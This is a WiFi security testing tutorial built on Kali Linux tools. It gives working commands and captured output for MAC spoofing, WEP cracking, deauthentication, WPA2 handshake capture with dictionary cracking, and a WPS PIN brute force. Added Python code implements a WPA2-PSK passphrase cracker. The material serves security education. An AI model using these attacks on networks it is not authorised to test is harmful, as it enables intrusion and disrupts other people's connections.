WiFi Wireless Security Testing and Defence

Why wireless WiFi security testing is needed

The state of WiFi adoption

  • More and more mobile devices now use WiFi to reach the Internet; wireless WiFi has become the main way mobile devices get online.
  • With wireless networks everywhere, ever more devices join WiFi LANs. A malicious user on that LAN can very likely harm the network, so an organisation needs to invest real effort in WiFi security testing and defence.

Viewing network interface information

  • In Kali Linux the ifconfig command shows the network interfaces.
┌──(root💀kali)-[~/桌面]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.184  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fe1a:4004  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:1a:40:04  txqueuelen 1000  (Ethernet)
        RX packets 65314  bytes 4499172 (4.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 75817  bytes 52246705 (49.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 24  bytes 1200 (1.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 24  bytes 1200 (1.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

  • The output lists two interfaces, eth0 and lo: inet is the IPv4 address, netmask the subnet mask and ether the MAC address.
  • The iwconfig command lists the wireless interfaces (only these can be used for wireless sniffing and injection, and only when the chipset and driver support monitor mode, as the RT5370/rt2800usb card used here does).
┌──(root💀kali)-[~/桌面]
└─# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Increasing the wireless card's transmit power

  • iwconfig wlan0 txpower 30 asks the driver to raise wlan0's transmit power to 30 dBm. Whether it takes effect depends on the card and on the regulatory limits the kernel enforces, so re-check the value with iwconfig afterwards.
┌──(root💀kali)-[~/桌面]
└─# iwconfig wlan0 txpower 30

┌──(root💀kali)-[~/桌面]
└─# iwconfig wlan0            
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

# My card does not support raising the power

WiFi wireless reconnaissance

Enabling monitor mode on the wireless card

  • A wireless card attached to Kali Linux is not yet in a state where it can capture 802.11 frames; monitor mode has to be enabled by hand. airmon-ng start wlan0 does this for wlan0. (Monitor mode is not Ethernet promiscuous mode: it delivers raw 802.11 management and data frames from every network on the current channel without associating to any AP.)
┌──(root💀kali)-[~/桌面]
└─# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    481 NetworkManager
    675 dhclient

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       Ralink Technology, Corp. RT5370
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
  • Running iwconfig again shows that wlan0 has been replaced by the monitor interface wlan0mon.
┌──(root💀kali)-[~/桌面]
└─# iwconfig      
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
  • If enabling monitor mode runs into the problem warned about above, airmon-ng check kill stops the interfering processes; otherwise NetworkManager and dhclient keep changing channels or put the card back into managed mode.
┌──(root💀kali)-[~/桌面]
└─# airmon-ng check kill 

Killing these processes:

    PID Name
    675 dhclient

Sniffing the WiFi networks in range

  • In a WiFi network the AP and its clients are typically within roughly 100 m of each other, so from where we stand we can discover the wireless networks in that range with airodump-ng wlan0mon. Without -c it hops across channels, so the frame counts are samples rather than totals.
┌──(root💀kali)-[~/桌面]
└─# airodump-ng wlan0mon

 CH  4 ][ Elapsed: 1 min ][ 2021-03-18 20:28

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 D0:C7:C0:18:59:C0  -62       22        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_59C0
 48:7D:2E:59:BA:60  -62       27      201    0  11  405   WPA2 CCMP   PSK  TP-LINK_BA60
 70:3A:73:09:AD:B1  -67       14        0    0  13  130   OPN              <length:  0>
 70:3A:73:11:AD:B1  -67        4        7    0  13  130   OPN              HZJS-GiWiFi
 70:3A:73:11:AD:D9  -76        5      141    0   1  130   OPN              HZJS-GiWiFi
 70:3A:73:11:B1:00  -73        1        1    0   1  130   OPN              HZJS-GiWiFi
 70:3A:73:09:AD:D9  -73        4        0    0   1  130   OPN              <length:  0>

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 48:7D:2E:59:BA:60  5C:3A:45:9C:1C:27  -48    1e- 1     90      332         TP-LINK_BA60
 48:7D:2E:59:BA:60  98:F6:21:C4:7E:C3  -58    0 - 1e     0        2
 48:7D:2E:59:BA:60  A4:4B:D5:95:36:D4  -70    0 - 1e     0        2
 48:7D:2E:59:BA:60  6A:14:82:F1:2F:36  -40    0 - 6e     0       15
 70:3A:73:11:B1:00  36:66:92:43:F9:EC   -1    1e- 0      0        1
Quitting...
  • BSSID is the AP's MAC address, ESSID the network name, CH the channel, PWR the signal level, ENC the encryption (OPN = open, WEP, WPA, WPA2), CIPHER the cipher (CCMP or TKIP) and AUTH the authentication type (PSK = pre-shared key, MGT = 802.1X/enterprise). The second table lists STATIONs, i.e. clients, with the BSSID each is associated to and the ESSIDs it probes for.
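
The scan above is the raw material for choosing a target, so the following added example (not part of the original page or of the aircrack-ng suite) parses the CSV that airodump-ng writes next to the .cap when run with -w and ranks what it finds: open networks, WEP networks, and WPA/WPA2-PSK networks that have associated clients (the ones a deauth can force a handshake from). The column layout is assumed to be airodump-ng's usual one; the sample data is constructed to mirror the scan above, with one made-up WEP network added to exercise that branch.

```python
import csv
import io
from dataclasses import dataclass, field

# Constructed sample in the column layout airodump-ng writes to <prefix>-01.csv when run
# with -w (assumption: that layout). Values mirror the scan above; OLD-CAM is made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
D0:C7:C0:18:59:C0, 2021-03-18 20:27:10, 2021-03-18 20:28:11,  6, 270, WPA2, CCMP, PSK, -62,       22,        0,   0.  0.  0.  0,  12, TP-LINK_59C0, 
48:7D:2E:59:BA:60, 2021-03-18 20:27:10, 2021-03-18 20:28:11, 11, 405, WPA2, CCMP, PSK, -62,       27,      201,   0.  0.  0.  0,  12, TP-LINK_BA60, 
70:3A:73:11:AD:B1, 2021-03-18 20:27:12, 2021-03-18 20:28:10, 13, 130, OPN ,  ,  , -67,        4,        7,   0.  0.  0.  0,  11, HZJS-GiWiFi, 
00:11:22:33:44:55, 2021-03-18 20:27:15, 2021-03-18 20:28:09,  1,  54, WEP , WEP ,  , -70,       10,      873,   0.  0.  0.  0,   7, OLD-CAM, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
5C:3A:45:9C:1C:27, 2021-03-18 20:27:11, 2021-03-18 20:28:11, -48,      332, 48:7D:2E:59:BA:60, TP-LINK_BA60
A4:4B:D5:95:36:D4, 2021-03-18 20:27:20, 2021-03-18 20:28:05, -70,        2, 48:7D:2E:59:BA:60, 
36:66:92:43:F9:EC, 2021-03-18 20:27:30, 2021-03-18 20:27:30,  -1,        1, (not associated), HZJS-GiWiFi
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str      # "OPN", "WEP", "WPA", "WPA2" or combinations such as "WPA2 WPA"
    cipher: str
    auth: str         # "PSK", "MGT" or empty
    power: int
    ivs: int          # "# IV": data frames seen, i.e. WEP IVs collected so far
    essid: str
    clients: list = field(default_factory=list)


@dataclass
class Station:
    mac: str
    power: int
    packets: int
    bssid: str        # "(not associated)" for clients that are only probing
    probes: list


def parse_airodump_csv(text):
    """Split the CSV into its AP and station sections and link each client to its BSSID."""
    aps, stations = {}, []
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [c.strip() for c in row]
        if not row or not row[0]:
            continue                      # blank separator line between the sections
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "station"
            continue
        if section == "ap":
            ap = AccessPoint(bssid=row[0], channel=int(row[3]), privacy=row[5],
                             cipher=row[6], auth=row[7], power=int(row[8]),
                             ivs=int(row[10]), essid=row[13])
            aps[ap.bssid] = ap
        elif section == "station":
            st = Station(mac=row[0], power=int(row[3]), packets=int(row[4]),
                         bssid=row[5], probes=[p for p in row[6:] if p])
            stations.append(st)
            if st.bssid in aps:
                aps[st.bssid].clients.append(st.mac)
    return aps, stations


def triage(aps):
    """Rank what the scan exposes, weakest first: open, WEP, then PSK networks with clients."""
    findings = []
    for ap in aps.values():
        name = ap.essid or "<hidden>"
        if ap.privacy == "OPN":
            findings.append((0, ap.bssid, f"{name}: open network, traffic readable by anyone in range"))
        elif "WEP" in ap.privacy:
            findings.append((1, ap.bssid, f"{name}: WEP, key recoverable from captured IVs ({ap.ivs} so far)"))
        elif ap.auth == "PSK" and ap.clients:
            findings.append((2, ap.bssid, f"{name}: WPA/WPA2-PSK with {len(ap.clients)} client(s); "
                                          f"a deauth can force a handshake for offline cracking"))
    findings.sort()
    return [(bssid, why) for _, bssid, why in findings]


if __name__ == "__main__":
    found_aps, _ = parse_airodump_csv(SAMPLE_CSV)
    for bssid, why in triage(found_aps):
        print(bssid, why)
```

A PSK network with no clients (TP-LINK_59C0 in the sample) is deliberately not flagged: without a client to deauthenticate there is no handshake to capture, and because airodump-ng hops channels when run without -c, an empty STATION list may just mean the card was elsewhere when the client talked.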

Bypassing MAC address authentication

MAC address restrictions in WiFi authentication

  • In the router's admin interface you can restrict access to a whitelist of specific MAC addresses. A MAC address is the hardware address burned into the card and unique to it, and the assumption behind the filter is that it cannot be changed. In practice the address the driver puts on the air is trivially changed, and the MACs of already-authorised clients are visible in the clear in airodump-ng's STATION column, so MAC filtering is not an authentication control.

Changing the card's MAC address

  • In Kali Linux ifconfig shows the interface details, including the MAC address.
  • ifconfig eth0 shows the details of eth0; the value after ether is the MAC address.
┌──(root💀kali)-[~/桌面]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.184  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fe1a:4004  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:1a:40:04  txqueuelen 1000  (Ethernet)
        RX packets 8  bytes 1694 (1.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 32  bytes 3422 (3.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • The burned-in hardware MAC itself cannot be changed, but Kali Linux ships macchanger, which rewrites the address the interface uses.
┌──(root💀kali)-[~/桌面]
└─# macchanger -h
GNU MAC Changer
Usage: macchanger [options] device

  -h,  --help                   Print this help
  -V,  --version                Print version and exit
  -s,  --show                   Print the MAC address and exit
  -e,  --ending                 Don't change the vendor bytes
  -a,  --another                Set random vendor MAC of the same kind
  -A                            Set random vendor MAC of any kind
  -p,  --permanent              Reset to original, permanent hardware MAC
  -r,  --random                 Set fully random MAC
  -l,  --list[=keyword]         Print known vendors
  -b,  --bia                    Pretend to be a burned-in-address
  -m,  --mac=XX:XX:XX:XX:XX:XX
       --mac XX:XX:XX:XX:XX:XX  Set the MAC XX:XX:XX:XX:XX:XX

Report bugs to https://github.com/alobbs/macchanger/issues
  • macchanger -m AA:AA:AA:AA:AA:AA eth0 sets eth0's MAC address. The same works for the wireless interface, which is the one that matters for bypassing a WiFi MAC whitelist: clone a MAC seen in airodump-ng's STATION list. Many drivers only accept the change while the interface is down, and macchanger -p restores the permanent address.
┌──(root💀kali)-[~/桌面]
└─# macchanger -m AA:AA:AA:AA:AA:AA eth0                                                                                                                                                                                                
Current MAC:   00:0c:29:1a:40:04 (VMware, Inc.)
Permanent MAC: 00:0c:29:1a:40:04 (VMware, Inc.)
New MAC:       aa:aa:aa:aa:aa:aa (unknown)

┌──(root💀kali)-[~/桌面]
└─# ifconfig eth0 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.184  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fe1a:4004  prefixlen 64  scopeid 0x20<link>
        ether aa:aa:aa:aa:aa:aa  txqueuelen 1000  (Ethernet)
        RX packets 11  bytes 2339 (2.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 38  bytes 4184 (4.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Cracking WEP-encrypted WiFi

How WEP cracking works

  • WEP encrypts the traffic of a WiFi network to keep unknown devices off the router. The encryption standards a WiFi network can use are WEP, WPA and WPA2.
  • Wired Equivalent Privacy (WEP) was once the most widely used WiFi security algorithm. For historical and backward-compatibility reasons it still sits first in the encryption-type menu of many routers' control panels.
  • WEP was ratified as a WiFi security standard in September 1999. Even for its day the first version was not strong: US export restrictions on cryptography meant manufacturers shipped only 64-bit encryption (a 40-bit key plus a 24-bit IV). When the restriction was lifted the strength was raised to 128 bits (a 104-bit key plus the same 24-bit IV). 256-bit WEP was introduced later, but 128-bit remained the most common.
  • Despite revised algorithms and longer keys, many flaws were found in the WEP standard over time, and as computing power grew they became easier to exploit. Proof-of-concept attacks existed by 2001 (the Fluhrer-Mantin-Shamir key-recovery attack on RC4); in 2005 the FBI gave a public demonstration, to raise awareness of WEP's weaknesses, in which freely available software recovered a WEP key in minutes.
  • Various improvements, workarounds and attempts to prop up WEP followed, but it remains very fragile: systems that depend on WEP should be upgraded, and if they cannot be upgraded securely, replaced. The WiFi Alliance officially retired WEP in 2004.

Cracking WEP WiFi authentication

  • Enable monitor mode: airmon-ng start wlan0
  • Identify the target: airodump-ng wlan0mon
  • Capture WEP traffic: airodump-ng --bssid <AP MAC> --channel <channel> --write <WEP capture prefix> wlan0mon
  • Generate more traffic with ARP request replay: aireplay-ng -3 -b <AP MAC> -h <MAC of a client associated to the AP> wlan0mon. This is not a DoS: -3 re-injects captured ARP requests so that the AP answers with fresh encrypted frames, each carrying a new IV, which is what the key recovery needs. -h must be a MAC the AP accepts traffic from, i.e. an associated client's.
  • Recover the key: aircrack-ng <WEP capture prefix>-01.cap

Note: capture enough WEP frames (tens of thousands with distinct IVs for a 104-bit key) before cracking; with too few, aircrack-ng fails or takes far longer.
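
Why a 24-bit IV is the root of the problem, as an added example that is not part of the original page or of aircrack-ng: it implements WEP's RC4(IV || key) framing, shows that two frames sharing an IV let an attacker who knows one frame's plaintext decrypt the other without the key, and computes how few frames it takes before an IV repeats. The key, IV and frame contents are constructed for the demonstration. aircrack-ng's own PTW key recovery goes further, exploiting statistical biases in RC4's first output bytes, which is why it wants tens of thousands of distinct IVs rather than one collision.

```python
import math
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream generation); WEP seeds it with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte IV sent in the clear, then RC4(IV || key) over plaintext || CRC32 (the ICV)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + secret_key, plaintext + icv)


def wep_decrypt(secret_key: bytes, frame: bytes):
    """Legitimate receiver: returns the plaintext, or None if the ICV does not match."""
    iv, body = frame[:3], frame[3:]
    plain = rc4(iv + secret_key, body)
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Attacker: once one frame's plaintext is known, keystream = ciphertext XOR plaintext for that IV."""
    iv, body = frame[:3], frame[3:]
    return iv, bytes(c ^ p for c, p in zip(body, known_plaintext))


def decrypt_with_keystream(frame: bytes, keystreams: dict):
    """Attacker: any frame that reuses a known IV is decrypted without the key, up to the keystream length."""
    iv, body = frame[:3], frame[3:]
    ks = keystreams.get(iv)
    if ks is None:
        return None
    return bytes(c ^ k for c, k in zip(body, ks))


def frames_until_iv_collision(p: float = 0.5, iv_bits: int = 24) -> int:
    """Birthday bound: number of frames after which two share an IV with probability p."""
    return math.ceil(math.sqrt(2 * (2 ** iv_bits) * math.log(1 / (1 - p))))


# Constructed demonstration values (assumptions, not taken from any real capture).
SECRET_KEY = bytes.fromhex("0102030405")          # 40-bit key, the "64-bit WEP" setting
IV = bytes.fromhex("0a0b0c")
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")   # header every IPv4 data frame starts with
KNOWN = LLC_SNAP_IP + b"ping-payload-known-to-the-attacker"   # e.g. a ping the attacker sent
SECRET = LLC_SNAP_IP + b"victim password: hunter2"


def demo() -> bytes:
    """Two frames share an IV; the first has known plaintext, so the second falls without the key."""
    known_frame = wep_encrypt(SECRET_KEY, IV, KNOWN)
    secret_frame = wep_encrypt(SECRET_KEY, IV, SECRET)
    iv, ks = recover_keystream(known_frame, KNOWN)
    plain = decrypt_with_keystream(secret_frame, {iv: ks})
    return plain[:-4]        # the keystream covers the whole frame here, so the last 4 bytes are the ICV


if __name__ == "__main__":
    print(demo())
    print("frames until a 50% chance of an IV repeat:", frames_until_iv_collision())
```

With 2^24 possible IVs a busy AP repeats one after a few thousand frames, and many WEP implementations reset the IV counter to zero on power-up, so collisions arrive far sooner than the birthday bound suggests; the ICV is a plain CRC32 and gives no integrity protection against an attacker who holds the keystream.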

Cracking WPA- or WPA2-encrypted WiFi

How WPA and WPA2 cracking works

  • Principle: every time a client authenticates to a WPA/WPA2-PSK network it exchanges a four-way handshake with the AP. The pre-shared key is never sent, but message 2 of the handshake carries a MIC keyed with a key derived from the passphrase, the SSID, both MAC addresses and the two nonces, all of which are in the captured frames. Once the handshake is captured, every candidate passphrase from a dictionary can be checked offline by recomputing that MIC. This only works against PSK (personal) networks with a guessable passphrase; a long random passphrase, or 802.1X (MGT) authentication, is not recoverable this way.

Cracking WPA/WPA2 WiFi authentication

  • Enable monitor mode: airmon-ng start wlan0 (same output as in the reconnaissance section above).
  • Identify the target: airodump-ng wlan0mon (same output as in the reconnaissance section above). The target here is TP-LINK_BA60, BSSID 48:7D:2E:59:BA:60, WPA2/CCMP/PSK, with several associated clients.
  • Capture the handshake: airodump-ng --bssid <AP MAC> --channel <channel> --write <capture prefix> wlan0mon. Lock onto the target's channel; without -c the card keeps hopping and misses the EAPOL frames.
┌──(root💀kali)-[~]
└─# airodump-ng --bssid 48:7d:2E:59:ba:60 -c 6 -w wifi wlan0mon
23:27:39  Created capture file "wifi-01.cap".

 CH  6 ][ Elapsed: 54 s ][ 2021-03-21 23:28 ][ WPA handshake: 48:7D:2E:59:BA:60                                     

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                

 48:7D:2E:59:BA:60  -55  90      387      161    0   6  405   WPA2 CCMP   PSK  TP-LINK_BA60                         

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                  

 48:7D:2E:59:BA:60  6A:14:82:F1:2F:36  -36    1e- 6e     0       20                                                 
 48:7D:2E:59:BA:60  A4:4B:D5:95:36:D4  -38    1e- 1e     6      169  EAPOL                                          
 48:7D:2E:59:BA:60  96:F6:49:32:22:AB  -58   11e- 1e   161      124                                                 
 48:7D:2E:59:BA:60  5C:3A:45:9C:1C:27  -62    0 - 1      4     1004         TP-LINK_BA60                            
Quitting...                                                                              

# Once the top line shows "WPA handshake: <BSSID>" the capture has what aircrack-ng needs; the EAPOL mark in the Notes column shows which client re-authenticated.
  • Force a re-authentication (deauthentication attack) to obtain a handshake: aireplay-ng -0 <count> -a <AP MAC> -c <client MAC> wlan0mon. -0 0 sends deauth frames without limit; stop it with Ctrl-C as soon as airodump-ng reports the handshake. The run below passed the client MAC with -e, which is the ESSID option, so aireplay-ng warned about the mismatch and sent the deauth to broadcast; -c <client MAC> is the targeted and, as its own message says, more effective form.
┌──(root💀kali)-[~]
└─# aireplay-ng -0 0 -a 48:7d:2e:59:ba:60 -e a4:48:d5:95:36:d4 wlan0mon                                
23:43:32  Waiting for beacon frame (BSSID: 48:7D:2E:59:BA:60) on channel 6
For the given BSSID "48:7D:2E:59:BA:60", there is an ESSID mismatch!
Found ESSID "TP-LINK_BA60" vs. specified ESSID "a4:48:d5:95:36:d4"
Using the given one, double check it to be sure its correct!
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
23:43:32  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:33  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:33  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:34  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:34  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:35  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:36  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:36  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:37  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:37  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:38  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:38  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:39  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:39  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:40  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:41  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
  • Crack the passphrase: aircrack-ng -w <wordlist> <capture prefix>-01.cap. Master Key in the output is the PMK derived from the passphrase and SSID; Transient Key is the per-session PTK.
┌──(root💀kali)-[~]
└─# aircrack-ng -w password wifi-01.cap                        
Reading packets, please wait...
Opening wifi-01.cap
Read 17566 packets.

   #  BSSID              ESSID                     Encryption

   1  48:7D:2E:59:BA:60  TP-LINK_BA60              WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening wifi-01.cap
Read 17566 packets.

1 potential targets


                               Aircrack-ng 1.6 

      [00:00:00] 22/22 keys tested (751.24 k/s) 

      Time left: --

                        KEY FOUND! [ 1234567890 ]


      Master Key     : DD E9 C2 78 F0 1A 57 F5 E1 E2 47 44 F1 9B EC B3 
                       1E D7 DE AE 34 7A BF 11 08 74 71 66 50 A3 34 04 

      Transient Key  : BC 2B B8 26 99 39 D3 AD 9B 10 CA 66 E6 96 62 F1 
                       36 B8 25 1D 4F 34 41 1A 55 A1 5D 0A 43 E6 7B CF 
                       1D 6B 27 67 D8 CC C9 02 AC 5A 43 07 A2 6B 52 1F 
                       31 2D DA 82 13 63 37 9C 2D 04 B8 52 41 72 1C 00 
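
What aircrack-ng does for each of the 22 words above, as an added example that is not part of the original page or of the aircrack-ng suite: PBKDF2-HMAC-SHA1 turns passphrase and SSID into the PMK (the Master Key printed above), PRF-512 over the two MACs and two nonces turns the PMK into the PTK (the Transient Key), and the first 16 bytes of the PTK, the KCK, key the MIC in handshake message 2. A candidate is correct exactly when the recomputed MIC matches the captured one. Fluxion's "hash verification" step later on the page applies the same check to the password a victim types into the captive portal. The SSID and MACs are those of the run above; the nonces, RSN IE and handshake frame are constructed here (the passphrase is set to the one the run recovered so the result can be compared), and the one external check is the 802.11i test vector for "password"/"IEEE".

```python
import hashlib
import hmac
import struct

MIC_OFFSET = 4 + 77   # EAPOL header (4 bytes) + position of Key MIC inside the EAPOL-Key body


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (aircrack-ng's 'Master Key'): PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK ('Transient Key') = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed: HMAC-SHA1-128 for key
    descriptor version 2 (WPA2/CCMP), HMAC-MD5 for version 1 (WPA/TKIP)."""
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.md5 if version == 1 else hashlib.sha1).digest()[:16]


def verify_passphrase(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2) -> bool:
    """The per-word check: passphrase -> PMK -> PTK -> KCK, then recompute and compare the MIC."""
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic)


def crack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2):
    """Dictionary attack over a captured message 2; returns the passphrase or None."""
    for candidate in wordlist:
        if verify_passphrase(candidate, ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2):
            return candidate
    return None


def build_msg2(kck: bytes, snonce: bytes, key_data: bytes, replay_counter: int = 1) -> bytes:
    """Constructed handshake message 2 (supplicant -> AP); key info 0x010a = version 2, pairwise, MIC set."""
    body = (struct.pack(">BHHQ", 2, 0x010A, 16, replay_counter) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8      # Key IV, Key RSC, Key ID
            + b"\x00" * 16                                   # MIC, filled in below
            + struct.pack(">H", len(key_data)) + key_data)   # supplicant's RSN IE
    eapol = struct.pack(">BBH", 2, 3, len(body)) + body      # 802.1X v2, type 3 = EAPOL-Key
    mic = eapol_mic(kck, eapol)
    return eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]


# Constructed capture: SSID and MACs as in the run above; nonces, RSN IE and passphrase made up here.
SSID = "TP-LINK_BA60"
AP_MAC = bytes.fromhex("487d2e59ba60")
STA_MAC = bytes.fromhex("a44bd59536d4")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # WPA2, CCMP, PSK
TRUE_PASSPHRASE = "1234567890"
EAPOL_MSG2 = build_msg2(wpa_ptk(wpa_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16],
                        SNONCE, RSN_IE)


def demo():
    wordlist = ["password", "admin123", "TP-LINK_BA60", "1234567890", "qwerty"]
    return crack(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2)


if __name__ == "__main__":
    print("KEY FOUND!" if demo() else "KEY NOT FOUND", demo())
```

The 4096 PBKDF2 rounds (8192 SHA-1 calls per guess) are why aircrack-ng reports only hundreds or thousands of keys per second on a CPU, and also why the only real defence for a PSK network is a passphrase that no dictionary or rule set will reach; the MIC check itself costs nothing. The RSN IE and nonces in message 2 are read straight from the capture in a real run, which is all the attacker needs: nothing from the AP's message 3 or 4 is used.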


Cracking the WiFi PIN (WPS)

The PIN in wireless WiFi

  • Routers with WPS (WiFi Protected Setup) enabled accept an 8-digit numeric PIN for registration. The last digit is a checksum, and the protocol confirms the first four digits and the remaining three separately, so an attacker needs at most 10,000 + 1,000 = 11,000 attempts instead of 10^8, which is why the PIN is easy to brute-force. The defence is to disable WPS PIN authentication on the router.

Cracking the PIN with Reaver

  • List the networks with WPS enabled: wash -i <interface>. The Lck column shows whether the AP has locked WPS after too many failed attempts.
┌──(root💀kali)-[~/桌面]
└─# wash -i wlan0mon
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
D0:C7:C0:18:59:C0    6  -65  2.0  No   Unknown   TP-LINK_59C0
  • Run the attack: reaver -i <interface> -b <AP MAC> -vv -c <channel>
┌──(root💀kali)-[~/桌面]
└─# reaver -i wlan0mon -b D0:C7:C0:18:59:C0 -vv -c 6

Reaver v1.6.6 WiFi Protected Setup Attack Tool
